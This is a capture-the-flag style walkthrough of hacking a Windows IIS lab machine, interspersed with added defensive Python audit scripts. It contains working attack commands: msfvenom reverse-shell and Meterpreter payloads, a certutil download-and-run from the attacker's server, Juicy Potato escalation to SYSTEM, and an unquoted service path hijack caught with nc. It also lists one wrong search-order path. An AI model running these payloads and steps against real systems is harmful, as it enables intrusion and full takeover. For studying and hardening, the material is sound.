image-20250719195443228

image-20250719200407486

There is an FTP service that allows anonymous login and permits both get and put operations.

ftp> get iisstart.htm
local: iisstart.htm remote: iisstart.htm
229 Entering Extended Passive Mode (|||49166|)
150 Opening ASCII mode data connection.
100% |**********************************************************************************************************************************************************************| 689 667.51 KiB/s 00:00 ETA
226 Transfer complete.
689 bytes received in 00:00 (501.00 KiB/s)

└─# cat iisstart.htm  
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>IIS7</title>
<style type="text/css">
<!--
body {
color:#000000;
background-color:#B3B3B3;
margin:0;
}

#container {
margin-left:auto;
margin-right:auto;
text-align:center;
}

a img {
border:none;
}

-->
</style>
</head>
<body>
<div id="container">
<a href="http://go.microsoft.com/fwlink/?linkid=66138&amp;clcid=0x409"><img src="welcome.png" alt="IIS7" width="571" height="411" /></a>
</div>
</body>
</html>
ftp> put user.txt
local: user.txt remote: user.txt
229 Entering Extended Passive Mode (|||49167|)
150 Opening ASCII mode data connection.
100% |**********************************************************************************************************************************************************************| 32 17.36 KiB/s 00:00 ETA
226 Transfer complete.
32 bytes sent in 00:00 (11.59 KiB/s)
ftp> ls
229 Entering Extended Passive Mode (|||49168|)
125 Data connection already open; Transfer starting.
10-05-24 12:16PM <DIR> aspnet_client
10-05-24 12:27AM 689 iisstart.htm
07-19-25 02:45PM 32 user.txt
10-05-24 12:27AM 184946 welcome.png
226 Transfer complete.
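As an added example (my own code, not from the original writeup), the following Python helper parses the IIS-style FTP listing shown above and flags files that are newer than the deployment baseline or carry a server-executable extension, which is what a defender would look for in an anonymously writable web root. It also contains a live audit function that reports whether anonymous login and anonymous upload are enabled on an FTP server. The sample listing, the baseline date and the function names are constructed for the demo.

```python
import os
import re
from datetime import datetime
from ftplib import FTP, error_perm
from io import BytesIO

# Constructed sample: an IIS-style "ftp> ls" listing of an anonymous-writable
# web root, in the same format as the listing above (one extra dropped file).
SAMPLE_LISTING = """\
229 Entering Extended Passive Mode (|||49168|)
125 Data connection already open; Transfer starting.
10-05-24 12:16PM <DIR> aspnet_client
10-05-24 12:27AM 689 iisstart.htm
07-19-25 02:45PM 32 user.txt
07-19-25 03:10PM 3412 shell.aspx
10-05-24 12:27AM 184946 welcome.png
226 Transfer complete.
"""

# Assumed deployment date of the web root: anything newer was not placed by the deployment.
DEPLOYMENT_BASELINE = datetime(2024, 10, 6)

# Extensions IIS executes server-side, plus the usual dropped tooling.
RISKY_EXTENSIONS = {".aspx", ".asp", ".ashx", ".asmx", ".exe", ".dll", ".ps1", ".bat"}

# IIS FTP listing line: MM-DD-YY hh:mmAM|PM <DIR>|size name
LINE_RE = re.compile(r"^(\d{2}-\d{2}-\d{2})\s+(\d{1,2}:\d{2}[AP]M)\s+(<DIR>|\d+)\s+(.+)$")


def parse_iis_listing(text):
    """Parse IIS FTP 'ls' output into dicts with mtime, is_dir, size and name."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip FTP status lines such as "226 Transfer complete."
        date, clock, size, name = m.groups()
        entries.append({
            "mtime": datetime.strptime(f"{date} {clock}", "%m-%d-%y %I:%M%p"),
            "is_dir": size == "<DIR>",
            "size": None if size == "<DIR>" else int(size),
            "name": name,
        })
    return entries


def flag_risky_uploads(entries, baseline):
    """Names of files that are newer than the baseline or have a risky extension."""
    flagged = []
    for e in entries:
        if e["is_dir"]:
            continue
        ext = os.path.splitext(e["name"])[1].lower()
        if e["mtime"] > baseline or ext in RISKY_EXTENSIONS:
            flagged.append(e["name"])
    return flagged


def scan_listing(text, baseline=DEPLOYMENT_BASELINE):
    """Convenience wrapper: parse and flag in one call."""
    return flag_risky_uploads(parse_iis_listing(text), baseline)


def audit_anonymous_ftp(host, port=21, timeout=5):
    """Live configuration check (not exercised offline): report whether anonymous
    login succeeds and whether that account may upload. The marker file is
    deleted again so the check leaves nothing behind."""
    result = {"anonymous_login": False, "anonymous_write": False}
    ftp = FTP()
    ftp.connect(host, port, timeout=timeout)
    try:
        ftp.login()  # ftplib defaults to user "anonymous"
        result["anonymous_login"] = True
        marker = "ftp_audit_marker.txt"
        try:
            ftp.storbinary(f"STOR {marker}", BytesIO(b"audit"))
            result["anonymous_write"] = True
            ftp.delete(marker)
        except error_perm:
            pass  # 550: upload refused, which is the desired configuration
    except error_perm:
        pass  # 530: anonymous login refused, also the desired configuration
    finally:
        ftp.close()
    return result


if __name__ == "__main__":
    print(scan_listing(SAMPLE_LISTING))
```

Because the FTP root here is also the IIS web root, anything uploaded with a server-side extension is executed by IIS; the fix is to disable anonymous write (or anonymous access altogether) and to keep the FTP root separate from the web root.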

So we can simply upload an ASPX payload to get a reverse shell.

┌──(root㉿kali)-[~]
└─# msfvenom -p windows/x64/shell_reverse_tcp lhost=192.168.56.103 lport=8888 -a x64 --platform Windows -f aspx -o shell.aspx
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of aspx file: 3412 bytes
Saved as: shell.aspx

image-20250719203031920

Find the user flag.

c:\Users\quoted\Desktop>whoami /all
whoami /all

KULLANICI BİLGİLERİ
-------------------

Kullanıcı adı SID
============================ ========
nt authority\network service S-1-5-20


GRUP BİLGİLERİ
--------------

Grup Adı Tür SID Öznitelikler
==================================== ================ ============================================================= ============================================================
Zorunlu Etiket\Sistem Zorunlu Düzeyi Etiket S-1-16-16384
Everyone İyi bilinen grup S-1-1-0 Zorunlu grup, Varsayılan olarak etkin, Etkinleştirilmiş grup
BUILTIN\Users Diğer Ad S-1-5-32-545 Zorunlu grup, Varsayılan olarak etkin, Etkinleştirilmiş grup
NT AUTHORITY\SERVICE İyi bilinen grup S-1-5-6 Zorunlu grup, Varsayılan olarak etkin, Etkinleştirilmiş grup
KONSOL OTURUMU AÇMA İyi bilinen grup S-1-2-1 Zorunlu grup, Varsayılan olarak etkin, Etkinleştirilmiş grup
NT AUTHORITY\Authenticated Users İyi bilinen grup S-1-5-11 Zorunlu grup, Varsayılan olarak etkin, Etkinleştirilmiş grup
NT AUTHORITY\This Organization İyi bilinen grup S-1-5-15 Zorunlu grup, Varsayılan olarak etkin, Etkinleştirilmiş grup
BUILTIN\IIS_IUSRS Diğer Ad S-1-5-32-568 Zorunlu grup, Varsayılan olarak etkin, Etkinleştirilmiş grup
LOCAL İyi bilinen grup S-1-2-0 Zorunlu grup, Varsayılan olarak etkin, Etkinleştirilmiş grup
IIS APPPOOL\DefaultAppPool İyi bilinen grup S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415 Zorunlu grup, Varsayılan olarak etkin, Etkinleştirilmiş grup


AYRICALIK BİLGİLERİ
----------------------

Ayrıcalık Adı Açıklama Durum
============================= ======================================================== ==========
SeAssignPrimaryTokenPrivilege İşlem düzeyi belirtecini değiştir Devre Dışı
SeIncreaseQuotaPrivilege İşlem için bellek kotaları ayarla Devre Dışı
SeSecurityPrivilege Denetimi ve güvenlik günlüğünü yönet Devre Dışı
SeShutdownPrivilege Sistemi kapat Devre Dışı
SeAuditPrivilege Güvenlik denetimleri oluştur Devre Dışı
SeChangeNotifyPrivilege Çapraz geçiş denetimini atla Etkin
SeUndockPrivilege Bilgisayarı takma biriminden çıkar Devre Dışı
SeImpersonatePrivilege Kimlik doğrulamasından sonra istemcinin özelliklerini al Etkin
SeCreateGlobalPrivilege Genel nesneler oluştur Etkin
SeIncreaseWorkingSetPrivilege İşlem çalışma kümesini artır Devre Dışı
SeTimeZonePrivilege Saat dilimini değiştir Devre Dışı


The important point here is the SeImpersonatePrivilege privilege.

This privilege allows a service account to impersonate a client after authentication. In some situations, by chaining it with other Windows features (such as named pipes or DCOM), the privilege can be abused to escalate all the way to SYSTEM or Administrator.

The commonly used tools and techniques for this are known as the "Potato" family, for example Juicy Potato (or its modern successors Rogue Potato and PrintSpoofer).
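As an added example (not part of the original writeup), here is a Python parser for the privilege section of whoami /all that understands both the English and the Turkish output seen above and reports which SYSTEM-equivalent privileges the token holds. Triage of a compromised service or app-pool account starts with exactly this question. The sample text, the HIGH_RISK table and the function names are my own constructions.

```python
import re

# Constructed sample: the privilege section of "whoami /all" on a Turkish-locale
# Windows host, laid out like the output above.
SAMPLE_WHOAMI_PRIV = """\
AYRICALIK BİLGİLERİ
----------------------

Ayrıcalık Adı Açıklama Durum
============================= ======================================================== ==========
SeAssignPrimaryTokenPrivilege İşlem düzeyi belirtecini değiştir Devre Dışı
SeChangeNotifyPrivilege Çapraz geçiş denetimini atla Etkin
SeImpersonatePrivilege Kimlik doğrulamasından sonra istemcinin özelliklerini al Etkin
SeCreateGlobalPrivilege Genel nesneler oluştur Etkin
"""

# Privileges whose presence on a service or web-app account is effectively
# SYSTEM-equivalent: the impersonation/token pair (the "Potato" precondition)
# plus the usual backup/restore/debug/driver set.
HIGH_RISK = {
    "SeImpersonatePrivilege": "impersonate clients; Potato-style escalation to SYSTEM",
    "SeAssignPrimaryTokenPrivilege": "replace a process token; same escalation chain",
    "SeDebugPrivilege": "open any process, including SYSTEM ones",
    "SeBackupPrivilege": "read any file regardless of ACL (SAM and SYSTEM hives)",
    "SeRestorePrivilege": "write any file or registry key regardless of ACL",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeLoadDriverPrivilege": "load kernel drivers",
}

# The "enabled" state word for the locales this parser knows (English, Turkish);
# whoami prints the state as the last column.
ENABLED_WORDS = {"enabled", "etkin"}

PRIV_RE = re.compile(r"^(Se\w+Privilege)\b(.*)$")


def parse_privileges(text):
    """Return {privilege_name: enabled_bool} from whoami /priv or /all output."""
    privs = {}
    for line in text.splitlines():
        m = PRIV_RE.match(line.strip())
        if not m:
            continue
        name, rest = m.groups()
        last = rest.split()[-1].lower() if rest.split() else ""
        privs[name] = last in ENABLED_WORDS
    return privs


def assess_token(privs):
    """List (privilege, enabled, reason) for every high-risk privilege in the token.
    'Disabled' does not lower the risk: a process can re-enable any privilege
    its token holds with AdjustTokenPrivileges."""
    return [(p, privs[p], HIGH_RISK[p]) for p in HIGH_RISK if p in privs]


if __name__ == "__main__":
    for priv, enabled, why in assess_token(parse_privileges(SAMPLE_WHOAMI_PRIV)):
        state = "enabled" if enabled else "present but disabled"
        print(f"{priv:32s} {state:24s} {why}")
```

The defensive takeaway is that IIS application pools and services should run under accounts that do not hold SeImpersonatePrivilege unless they need it, and that a web shell running as NETWORK SERVICE or an app-pool identity should be treated as a SYSTEM compromise during incident response.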

Doing it with msf

First, get a Meterpreter shell.

─# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.103 LPORT=8081 -f exe > shell1.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes

Upload it:

└─# python3 -m http.server 80
c:\>certutil -urlcache -split -f http://192.168.56.103:80/shell1.exe c:\shell.exe
certutil -urlcache -split -f http://192.168.56.103:80/shell1.exe c:\shell.exe
**** Çevrimiçi ****
0000 ...
1c00
CertUtil: -URLCache komutu başarıyla tamamlandı.

c:\>dir
dir
C sürücüsündeki birimin etiketi yok.
Birim Seri Numarası: D4DC-8644

c:\ dizini

05.10.2024 13:23 <DIR> dotNet Update
05.10.2024 00:30 <DIR> inetpub
14.07.2009 06:20 <DIR> PerfLogs
05.10.2024 00:12 <DIR> Program Files
05.10.2024 00:21 <DIR> Program Files (x86)
19.07.2025 16:33 7.168 shell.exe
05.10.2024 12:16 <DIR> Users
05.10.2024 00:27 <DIR> Windows
1 Dosya 7.168 bayt
7 Dizin 22.105.141.248 bayt boş

c:\>shell.exe
shell.exe

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > show options

Payload options (generic/shell_reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Wildcard Target



View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > set LHOST 192.168.56.103
LHOST => 192.168.56.103
msf6 exploit(multi/handler) > set LPORT 8081
LPORT => 8081
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.56.103:8081
[-] Command shell session 1 is not valid and will be closed
[*] 192.168.56.108 - Command shell session 1 closed.
[-] Command shell session 2 is not valid and will be closed
[*] 192.168.56.108 - Command shell session 2 closed.


Here, for a reason I don't understand, the shell gets terminated very quickly.

The following steps should then be:

meterpreter > background 
[*] Backgrounding session 1...
msf6 post(windows/gather/enum_patches) > use exploit/multi/handler
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > run
msf6 > use exploit/windows/local/ms16_075_reflection_juicy
msf6 exploit(windows/local/ms16_075_reflection_juicy) > set session 1
msf6 exploit(windows/local/ms16_075_reflection_juicy) > set LHOST 192.168.56.105
msf6 exploit(windows/local/ms16_075_reflection_juicy) > exploit
[*] Started reverse TCP handler on 192.168.56.105:4444
[+] Target appears to be vulnerable (Windows 7 Service Pack 1)
[*] Launching notepad to host the exploit...
[+] Process 2500 launched.
[*] Reflectively injecting the exploit DLL into 2500...
[*] Injecting exploit into 2500...
[*] Exploit injected. Injecting exploit configuration into 2500...
[*] Configuration injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (177734 bytes) to 192.168.56.123
[*] Meterpreter session 2 opened (192.168.56.105:4444 -> 192.168.56.123:49176)

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Let's do it another way instead (Unquoted Service Path exploit).

image-20250720161406732

This is obvious here:

The path is not wrapped in double quotes "", which is the classic Unquoted Service Path vulnerability.

When the system starts the service, it may look for the executable in the following order:
C:\dotNet.exe
C:\dotNet\Update.exe
C:\dotNet Update\dotnet.exe
So one can:
Write dotNet.exe under C:\, or write Update.exe under C:\dotNet\
Name the malicious payload Update.exe
Start PEService
The payload then runs with the service's privileges (very likely LocalSystem)
┌──(root㉿kali)-[/myift/bachang/win]
└─# msfvenom -p windows/x64/shell_reverse_tcp lhost=192.168.56.103 lport=2345 -f exe > dotNet.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes

Upload this payload.

Then run sc start PEService and you get a shell.

┌──(root㉿kali)-[/myift/bachang/win]
└─# nc -lvnp 2345
listening on [any] 2345 ...
connect to [192.168.56.103] from (UNKNOWN) [192.168.56.108] 49181
Microsoft Windows [Sürüm 6.1.7601]
Telif Hakkı (c) 2009 Microsoft Corporation. Tüm hakları saklıdır.

If tools such as winPEAS or accesschk are not available:

reg query "HKLM\SYSTEM\CurrentControlSet\Services" /s /v ImagePath

List the services
Check for paths that contain a space but no quotes
Filter them directly with a Python script
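The reg query filter described above, and the search-order reasoning from the PEService section, written out as an added Python example (my own code, not from the writeup). It parses reg query output, flags ImagePath values that are unquoted and contain a space outside the Windows directory, lists the locations CreateProcess will try (the documented rule: each space-delimited prefix with .exe appended, then the full path, so for C:\dotNet Update\dotnet.exe that is C:\dotNet.exe followed by the full path), and builds the sc config command that fixes the entry. The sample reg output (apart from the PEService path, which is from the page) and the environment-variable table are constructed.

```python
import re

# Constructed sample: a fragment of
#   reg query "HKLM\SYSTEM\CurrentControlSet\Services" /s /v ImagePath
# PEService is the real entry from this box; the other three are made up.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PEService
    ImagePath    REG_EXPAND_SZ    C:\dotNet Update\dotnet.exe

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Spooler
    ImagePath    REG_EXPAND_SZ    %SystemRoot%\System32\spoolsv.exe

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ExampleSvc
    ImagePath    REG_EXPAND_SZ    "C:\Program Files\Example\svc.exe" -k netsvcs

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\OtherSvc
    ImagePath    REG_EXPAND_SZ    C:\Program Files\Other\other.exe --service
"""

KEY_RE = re.compile(r"^HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\([^\\\s]+)$", re.IGNORECASE)
VALUE_RE = re.compile(r"^\s*ImagePath\s+REG_\w+\s+(.+?)\s*$", re.IGNORECASE)
EXE_RE = re.compile(r"^(.*?\.exe)(.*)$", re.IGNORECASE)

# Environment expansion assumed for the offline demo; on a live host use os.path.expandvars.
ENV = {"%SystemRoot%": r"C:\Windows", "%ProgramFiles%": r"C:\Program Files"}


def expand(path):
    for var, val in ENV.items():
        path = re.sub(re.escape(var), lambda _m: val, path, flags=re.IGNORECASE)
    return path


def parse_image_paths(text):
    """Map service name -> raw ImagePath value from reg query output."""
    services, current = {}, None
    for line in text.splitlines():
        k = KEY_RE.match(line.strip())
        if k:
            current = k.group(1)
            continue
        v = VALUE_RE.match(line)
        if v and current:
            services[current] = v.group(1)
    return services


def split_exe(image_path):
    """Return (exe_path, args); a quoted path yields the quoted part as exe."""
    p = expand(image_path.strip())
    if p.startswith('"'):
        end = p.find('"', 1)
        return (p[1:], "") if end == -1 else (p[1:end], p[end + 1:])
    m = EXE_RE.match(p)
    return (m.group(1), m.group(2)) if m else (p, "")


def is_unquoted(image_path):
    """Unquoted, contains a space in the executable path, and not under C:\\Windows."""
    p = expand(image_path.strip())
    if p.startswith('"'):
        return False
    exe, _ = split_exe(p)
    if exe.lower().startswith("c:\\windows\\"):
        return False  # standard heuristic: system directory is not user-writable
    return " " in exe


def candidate_paths(exe):
    """Paths CreateProcess tries for an unquoted path: each space-delimited
    prefix with .exe appended, then the full path."""
    cands, idx = [], exe.find(" ")
    while idx != -1:
        cands.append(exe[:idx] + ".exe")
        idx = exe.find(" ", idx + 1)
    cands.append(exe)
    return cands


def fix_command(service, exe, args=""):
    """sc.exe command that rewrites the ImagePath with embedded quotes."""
    return f'sc config {service} binPath= "\\"{exe}\\"{args}"'


def audit(text):
    """Service name -> finding for every unquoted service path in the reg output."""
    findings = {}
    for svc, raw in parse_image_paths(text).items():
        if not is_unquoted(raw):
            continue
        exe, args = split_exe(raw)
        findings[svc] = {"image_path": raw, "candidates": candidate_paths(exe),
                         "fix": fix_command(svc, exe, args)}
    return findings


if __name__ == "__main__":
    for svc, f in audit(SAMPLE_REG_QUERY).items():
        print(svc, f["image_path"], f["candidates"], f["fix"], sep="\n  ")
```

On a real host, save the output of reg query to a file and pass its contents to audit(). Each finding needs two checks: quote the path (the printed sc config command does this) and verify with icacls that unprivileged users cannot create files in the candidate directories, here C:\ and C:\dotNet Update.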

image-20250720164450544

c:\>sc qc PEService
sc qc PEService
[SC] QueryServiceConfig BAŞARILI

SERVICE_NAME: PEService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\dotNet Update\dotnet.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : PEService
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

So the hijacked service runs as LocalSystem.